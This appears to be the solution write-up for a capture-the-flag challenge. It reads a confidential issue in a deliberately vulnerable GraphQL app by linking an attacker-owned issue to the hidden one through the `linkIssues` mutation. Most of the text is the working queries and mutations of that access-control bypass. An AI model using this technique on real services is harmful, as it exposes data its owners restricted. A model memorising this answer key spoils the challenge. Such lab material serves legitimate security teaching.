# Graphicle Two

The goal of this challenge is to find and view the confidential issue in the 
`Graphicle` project. The `projects` endpoint will allow you to view projects
you have created and public projects, but will not show confidential issues, 
unless you are the project owner. The twist in the challenge is to find a way
to reference the confidential issue, and that is through related issues. This
can only be done through a project/issue you have created, as the `linkIssues`
mutation only allows you to relate two issues if you are the owner of the 
source project/issue.

This challenge is solvable as follows:

1. Query the `projects` endpoint to get a list of known `public` projects and
their issues. Make note of the `id` field of the `Graphical` project and note
the `id` of the missing issue.
```
query {
  projects {
    id
    name
    description
    issues {
      id
      title
      description
      confidential
      related {
        id
        title
        description
        confidential
      }
    }
  }
}
```
1. Use the `createUser` mutation to create an account, which will also login 
for you. *Tip:* If you want to determine if you are logged in or not, use the
`currentUser` query.
```
mutation {
  createUser(input: {}) {
    user {
      id
      username
    }
  }
}
```
1. Use the `createProject` mutation to create a project. Make note of the `id`
of the project.

```
mutation {
  createProject(input: {
    name: "hackity hack hack"
    description: "I will find the issue!"
  }) {
    project {
      id
      name
      description
      private
    }
  }
}
```
1. Use the `createIssue` mutation to create an issue in the created project. 
Make note of the `id` of the issue.
```
mutation {
  createIssue(input: {title: "Issue to link all issues", description: "I want to see the hidden issue", projectId: 2}) {
    issue {
      id
      title
      description
      confidential
    }
  }
}
```
1. Use the `linkIssues` mutatation to link your issue to the confidential 
issue. The `id`s of your project/issue should be the `source_project_id` and 
`source_issue_id`, and the `id`s of the `Graphicle` project and confidential
issue should be the `target_project_id` and `target_issue_id`.
```
mutation {
  linkIssues(input: {sourceIssueId: 5, sourceProjectId: 2, targetIssueId: 3, targetProjectId: 1}) {
    success
  }
}
```
1. Use either the `projects` or `project(id)` endpoint to view your project, 
its issues, and their related issues.
```
{
  project(id: 2) {
    id
    name
    description
    issues {
      id
      title
      description
      confidential
      related {
        id
        title
        description
        confidential
      }
    }
  }
}
```
